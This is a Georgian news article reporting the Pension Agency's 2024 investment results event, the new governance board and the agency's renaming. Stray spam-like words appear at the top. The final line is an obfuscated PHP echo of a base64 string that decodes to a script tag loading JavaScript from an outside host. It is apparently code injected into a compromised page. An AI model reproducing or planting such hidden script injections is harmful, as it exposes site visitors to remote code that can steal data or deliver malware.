tube
ავერსი jaluzi

31 მარტს საპენსიო სააგენტომ 2024 წლის საინვესტიციო შედეგების შემაჯამებელი პრეზენტაცია გამართა და წლიური საინვესტიციო ანგარიში წარადგინა.

ამავე ღონისძიებაზე ფართო საზოგადოების წინაშე პირველად წარდგნენ საპენსიო ფონდის მმართველობითი საბჭოს ახლადდანიშნული წევრები, რომლებმაც პანელურ დისკუსიაში მიიღეს მონაწილეობა. 

ღონისძიებაზე შეკრებილ სტუმრებს სიტყვით მიმართეს საქართველოს ფინანსთა მინისტრმა ლაშა ხუციშვილმა და საქართველოს ეროვნული ბანკის პრეზიდენტმა ნათია თურნავამ. მათ მიულოცეს მმართველობითი საბჭოს ახალ წევრებს დანიშვნა და მომავალ საქმიანობაში წარმატება უსურვეს. 
საპენსიო სააგენტოს დირექტორის მოვალეობის შემსრულებელმა გიორგი ჭიჭინაძემ დამსწრეებს განახლებული სტატისტიკური მონაცემები გააცნო. მან ხაზი გაუსვა სქემაში გაწევრიანებული მონაწილეების მზარდ ტენდენციას და ასევე აღნიშნა, რომ  17 000-მა მოქალაქემ უკვე ისარგებლა დაგროვებითი პენსიით და მათზე გაცემულმა თანხამ 70 მილიონ ლარს გადააჭარბა. 
საპენსიო სააგენტოს მთავარი საინვესტიციო ოფიცრის მოვალეობის შემსრულებელმა ანა ნაჭყებიამ საინვესტიციო საქმიანობის შედეგებისა და პროცესების შესახებ დეტალური პრეზენტაცია წარადგინა. მან  მიმოიხილა გასული წლის საინვესტიციო საქმიანობა, საინვესტიციო პორტფელების სტრუქტურა და მომგებიანობა, როგორც 2024 წლისთვის, ისე ჯამურად. პრეზენტაციაში განსაკუთრებული ყურადღება დაეთმო საინვესტიციო პორტფელებს შორის განსხვავებებს და მათ შესაფერისობას სხვადასხვა რისკის პროფილის მონაწილეებისთვის. აღინიშნა, დინამიკური საინვესტიციო პორტფელის მაღალი მომგებიანობა, როგორც 2024 წელს, ისე მისი გაშვებიდან დღემდე. საინვესტიციო საქმიანობის შედეგად საპენსიო ფონდის დაარსებიდან დღემდე დაგენერირებულმა წმინდა ამონაგებმა 1.4 მლრდ ლარს გადააჭარბა.
ღონისძიების ფარგლებში  პანელური დისკუსიები გაიმართა, რომელშიც მოწვეულ სტუმრებთან ერთად მონაწილეობდნენ მმართველობითი საბჭოს  წევრები.  პირველი პანელი მიეძღვნა საპენსიო რეფორმის როლს კაპიტალის ბაზრის განვითარებაში. მასში მონაწილეობას იღებდნენ ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილე ირაკლი ნადარეიშვილი და მმართველობითი საბჭოს წევრები: ლევან შავკაციშვილი, მაიკლ რიდლი, ფრედერიკ ე. არტეზანი  და ჟან-ფრედერიკ პოლსენი. პანელური დისკუსიას  მოდერატორობას მთავარი საინვესტიციო ოფიცრის მოვალეობის შემსრულებელი ანა ნაჭყებია უწევდა.
მეორე პანელური დისკუსიის თემა „კარგი მმართველობის ჩარჩოს“ მიეძღვნა. პანელზე ეფექტური მმართველობის მნიშვნელობასა და როლზე ეროვნული ბანკის საბჭოს წევრმა და პირველმა ვიცე-პრეზიდენტმა ეკატერინე მიქაბაძემ ისაუბრა. მმართველობითი საბჭოს თავმჯდომარემ გრიგორი (გია) მორჩილაძემ საპენსიო სააგენტოს აქტუალურ საკითხებზე, მმართველობითი საბჭოს აქტივობებსა და სამომავლო გეგმებზე ისაუბრა. პანელურ დისკუსიაში მონაწილეობა მიიღეს მმართველობითი საბჭოს თავმჯდომარის მოადგილემ თეონა გუნცაძემ, საბჭოს წევრებმა თამარ ტყეშელაშვილმა და გიორგი მაისურაძემ. პანელური დისკუსიის მოდერატორი, კი  მმართველობითი საბჭოს თანამდებობრივი წევრი გიორგი გურგენიძე იყო. 
საპენსიო სააგენტომ საინვესტიციო შედეგების წლიური შემაჯამებელი ღონისძიება უკვე მეორედ გამართა. საპენსიო სააგენტო მეორე წელია აქვეყნებს წლიურ საინვესტიციო ანგარიშს, სადაც დეტალურადაა მიმოხილული საპენსიო სქემასთან დაკავშირებული სიახლეები, საინვესტიციო პორტფელების მომგებიანობა, რისკის მართვის ჩარჩო, მაკროეკონომიკური გარემო და ფინანსური ბაზრები, რაც საშუალებას აძლევს დაინტერესებულ მხარეებს ამომწურავი ინფორმაცია მიიღონ გასული წლის საინვესტიციო შედეგებზე. 
ახლადდანიშნული მმართველობითი საბჭო საქმიანობას უკვე შეუდგა და კანონმდებლობით მინიჭებული მანდატის ფარგლებში საბჭოს წევრები მუშაობენ განახლებული პოლიტიკა-პროცედურების შემუშავებაზე, ხოლო პირველი მაისიდან არსებულ საინვესტიციო და სამეთვალყურეო საბჭოებს განახლებული მმართველობითი საბჭო ოფიციალურად ჩაანაცვლებს. 
აღსანიშნავია, რომ პირველი მაისიდან ასევე იცვლება საპენსიო სააგენტოს სახელი და ორგანიზაცია “საქართველოს საპენსიო ფონდი”-ს სახელით გააგრძელებს საქმიანობას. საპენსიო ფონდი და მმართველობითი საბჭოს ახალი წევრები რჩებიან გამჭვირვალობის ერთგული და გააგრძელებენ საზოგადოებასთან კომუნიკაციას შემდგომი სიახლეებით.
117
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");